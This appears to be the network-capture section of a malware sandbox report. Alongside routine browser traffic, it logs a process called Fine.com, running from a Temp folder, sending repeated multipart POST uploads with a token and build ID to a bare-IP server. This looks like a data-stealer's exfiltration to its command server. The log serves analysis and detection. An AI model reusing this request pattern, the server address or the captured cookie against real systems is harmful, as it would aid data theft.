                                                                                                                                                                                                                                                                                                                          Data Ascii: Name\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:ne.hasOwnProperty(d)?a.setAttribute(ne[d],c):_.ie(d,\"aria-\")||_.ie(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};ne\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\",colspan:\"colSpan\",fra


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49924 | 142.250.185.228 | 443 | 5836 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:55 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-01-12 16:22:55 UTC | 933 | IN | HTTP/1.1 200 OK
Version: 713742394
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Sun, 12 Jan 2025 16:22:55 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2025-01-12 16:22:55 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-01-12 16:22:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49954 | 142.250.185.110 | 443 | 5836 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:58 UTC | 733 | OUT | GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1
Host: apis.google.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-01-12 16:22:58 UTC | 915 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
Content-Length: 117446
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sun, 12 Jan 2025 10:02:31 GMT
Expires: Mon, 12 Jan 2026 10:02:31 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Wed, 08 Jan 2025 15:23:05 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Age: 22827
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49966 | 172.217.18.14 | 443 | 5836 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:59 UTC | 726 | OUT | POST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 913
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
2025-01-12 16:22:59 UTC | 913 | OUT | Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1736698977198",null,null,null,
2025-01-12 16:22:59 UTC | 945 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                                                          Set-Cookie: NID=520=S9d7sdE7O3Dw1Df6XnYfuAHgf9x4dmwysgYnUyvsoKLVCUcm-gJFWNbv1iqpAYicgBTIG7JHMgkGW0PjyDtHBogezH3lg_GnazAVZtvuwWdrpqQJvHzYa4muPVmvnLgqMQ1z8GKkgl29gX0T8JFCyDL2bUQvkmvO4KU4qUsyoKSMtoxhv-nhUPW3I-s; expires=Mon, 14-Jul-2025 16:22:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:59 GMT
                                                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                          Expires: Sun, 12 Jan 2025 16:22:59 GMT
                                                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:59 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2025-01-12 16:22:59 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
12  192.168.2.5  49969  195.201.141.106  443  1440  C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp  Bytes transferred  Direction  Data
2025-01-12 16:22:59 UTC  182  OUT  POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----UAS0ZU3EUA1NYMY58GLX
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 505
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:59 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------UAS0ZU3EUA1NYMY58GLXCont
2025-01-12 16:23:00 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:00 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
2025-01-12 16:23:00 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
13  192.168.2.5  49978  195.201.141.106  443  1440  C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp  Bytes transferred  Direction  Data
2025-01-12 16:23:00 UTC  185  OUT  POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 213453
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------1VSRIWTJM7G47Q90HLN7Cont
2025-01-12 16:23:02 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:02 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49988 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com

Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:01 UTC | 184 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7
Host: 195.201.141.106
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:23:01 UTC | 16355 | OUT | Data Ascii:
------1VSRIWTJM7G47Q90HLN7
Content-Disposition: form-data; name="token"

effb1b070e532a9ec84de75fa450547c
------1VSRIWTJM7G47Q90HLN7
Content-Disposition: form-data; name="build_id"

a1d4cc855dd6f6350a1eadf6720ad1cf
------1VSRIWTJM7G47Q90HLN7
Cont
2025-01-12 16:23:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:23:03 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49995 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com

Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:03 UTC | 185 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VSJECJEC2VAIM79HVAIW
Host: 195.201.141.106
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:23:03 UTC | 16355 | OUT | Data Ascii:
------VSJECJEC2VAIM79HVAIW
Content-Disposition: form-data; name="token"

effb1b070e532a9ec84de75fa450547c
------VSJECJEC2VAIM79HVAIW
Content-Disposition: form-data; name="build_id"

a1d4cc855dd6f6350a1eadf6720ad1cf
------VSJECJEC2VAIM79HVAIW
Cont
2025-01-12 16:23:04 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:04 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
2025-01-12 16:23:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 50004 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:04 UTC | 182 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JWT2DT2NGVAAAIEUSR1N
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 493
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:04 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------JWT2DT2NGVAAAIEUSR1NContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------JWT2DT2NGVAAAIEUSR1NContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------JWT2DT2NGVAAAIEUSR1NCont
2025-01-12 16:23:05 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:05 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
2025-01-12 16:23:05 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 50043 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:10 UTC | 183 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IECBS26PZ58QIMOZU37Q
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 3165
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 53 32 36 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 53 32 36 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 53 32 36 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------IECBS26PZ58QIMOZU37QContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------IECBS26PZ58QIMOZU37QContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------IECBS26PZ58QIMOZU37QCont
2025-01-12 16:23:11 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:11 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
2025-01-12 16:23:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 50040 | 142.250.185.97 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:10 UTC | 594 | OUT | GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-12 16:23:10 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          X-GUploader-UploadID: AFIdbgQ7ESlYbUZzB8pql3DWTFELxD2n09WtjpIezUW1CX8WPd4aC1edma-QRG2LNJXSSTIc
                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                          Content-Length: 154477
                                                                                                                                                                                                                                                                                                                          X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 09:05:00 GMT
                                                                                                                                                                                                                                                                                                                          Expires: Mon, 12 Jan 2026 09:05:00 GMT
                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                          Age: 26290
                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                                          ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                                                          Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
